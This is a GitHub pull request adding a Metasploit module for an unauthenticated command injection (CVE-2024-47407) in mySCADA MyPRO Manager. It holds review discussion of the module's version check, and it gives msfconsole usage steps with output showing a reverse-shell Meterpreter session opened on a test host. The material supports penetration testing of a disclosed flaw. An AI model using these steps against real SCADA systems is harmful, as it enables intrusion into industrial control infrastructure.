mySCADA MyPRO Manager Command Injection (CVE-2024-47407) Module #19846

Merged
merged 2 commits into from
Feb 10, 2025

Conversation

h4x-x0r
Contributor

@h4x-x0r h4x-x0r commented Jan 29, 2025

This is a new module which exploits an unauthenticated command injection vulnerability in mySCADA MyPRO Manager <= v1.2 (CVE-2024-47407).

Successful exploitation allows injecting arbitrary OS commands, which will be executed in the context of myscada9, an administrative user that is automatically added by the product during installation.

Verification Steps

  1. Install the application from the vendor.
  2. After installation, reboot the system and wait some time until a runtime (e.g., 9.2.1) has been fetched and installed.
  3. Run Metasploit:
  • Start msfconsole and enter the following commands
  • use exploit/windows/scada/mypro_mgr_cmd
  • set RHOSTS <IP> (e.g., set RHOSTS 192.168.1.239)
  • exploit

This should result in a meterpreter session:

msf6 exploit(windows/scada/mypro_mgr_cmd) > exploit 

[*] Started reverse TCP handler on 192.168.1.227:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Sending stage (201798 bytes) to 192.168.1.228
[*] Meterpreter session 1 opened (192.168.1.227:4444 -> 192.168.1.228:50472) at 2025-01-29 12:38:39 -0500
[*] Exploit finished, check thy shell.

meterpreter > getuid 
Server username: asdf\myscada9
meterpreter > sysinfo 
Computer        : asdf
OS              : Windows 11 (10.0 Build 22621).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x64/windows

Successfully tested on

Tested in the following deployment, with both the curl and certutil fetch commands:

  • MyPRO Manager v1.2 on Windows 11 (10.0 Build 22621)

'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'assets/index-Aup6jYxO.js')
})
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
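Review bot: the rescue after the `send_request_cgi` call lists three subclasses of `::Rex::ConnectionError` (`ConnectionRefused`, `HostUnreachable`, `ConnectionTimeout`) next to their parent class, so `rescue ::Rex::ConnectionError` alone covers the same failures; whichever form is kept, make the handler return `CheckCode::Unknown` with a short message so the check does not continue with `res` unset.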
Contributor


Do we require the request to be wrapped in a rescue here?

Suggested change
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError

Contributor Author


I think I saw this pattern being used in some other modules. Which other way would you prefer?

@dledda-r7
Contributor

Adding some notes regarding the testing: so far I was not able to get the software running properly. I have tested that on

  • Windows 11 24H2 x64 on VMWare
  • Windows 11 23H2 x64 on Hyper-V
  • Windows 10 10.0.19045.5131 x64 on VMWare

So far the issue I have is the same across all the systems: once the software is installed, after rebooting, the MySCADA MyPRO Manager downloads the runtime, but the runtime never gets executed; there is no way to get it running for some reason.

@dledda-r7 dledda-r7 assigned dledda-r7 and unassigned dledda-r7 Feb 7, 2025
if res.to_s =~ /const v="([^"]+)"/
version = ::Regexp.last_match(1)
vprint_status('Version retrieved: ' + version)
if Rex::Version.new(version) <= Rex::Version.new('1.2')
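Review bot: the version gate at `Rex::Version.new(version) <= Rex::Version.new('1.2')` only works if `/const v="([^"]+)"/` matches the bundle fetched from the fixed path `assets/index-Aup6jYxO.js`; that filename looks like a content-hashed build artifact, so a rebuilt or patched release may serve a different name and the check would then report unknown rather than safe. Consider documenting that limitation or discovering the asset name from the index page as a fallback so the check stays meaningful on newer builds.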
Contributor


Is there a lower bound of vulnerable software version?

Contributor Author


As far as I am aware, no.
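The version gate discussed in this thread, as an added stand-alone illustration (not the module's code): it extracts the version from the JS bundle body the way the module's regex does, treats a missing match or an unparseable string as unknown, and compares versions numerically so that a build such as 1.10 is not mistaken for a vulnerable one by plain string comparison. Gem::Version is assumed as a stand-in for Rex::Version so the snippet runs outside Metasploit.

```ruby
require 'rubygems'

# Highest version the advisory names as affected; no lower bound is known
# (see the exchange above).
MAX_VULNERABLE = Gem::Version.new('1.2')

# Classify a fetched JS bundle body as :vulnerable, :safe or :unknown,
# mirroring CheckCode::Appears / Safe / Unknown in the module's check.
def classify_version(body)
  return :unknown if body.nil?

  m = body.to_s.match(/const v="([^"]+)"/)
  return :unknown unless m

  version = m[1]
  # Gem::Version.new raises on non-version strings; guard first.
  return :unknown unless Gem::Version.correct?(version)

  # Numeric comparison: 1.10 > 1.2 here, whereas String#<= would say the opposite.
  Gem::Version.new(version) <= MAX_VULNERABLE ? :vulnerable : :safe
end

# Constructed sample bodies, not captured from the product.
SAMPLE_VULN = 'import x from "./a.js";const v="1.2";export{v};'
SAMPLE_SAFE = 'const v="1.10";'
SAMPLE_NO_VERSION = 'const w="1.2";'

if __FILE__ == $PROGRAM_NAME
  [SAMPLE_VULN, SAMPLE_SAFE, SAMPLE_NO_VERSION, nil].each do |b|
    puts "#{b.inspect[0, 40]} -> #{classify_version(b)}"
  end
end
```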

@msutovsky-r7 msutovsky-r7 merged commit d96d980 into rapid7:master Feb 10, 2025
29 checks passed
@msutovsky-r7 msutovsky-r7 added the rn-modules release notes for new or majorly enhanced modules label Feb 10, 2025
@dledda-r7 dledda-r7 removed their assignment Feb 10, 2025
@msutovsky-r7
Contributor

Release Notes

A module for mySCADA myPRO Manager exploiting command injection (CVE-2024-47407) in the email parameter.
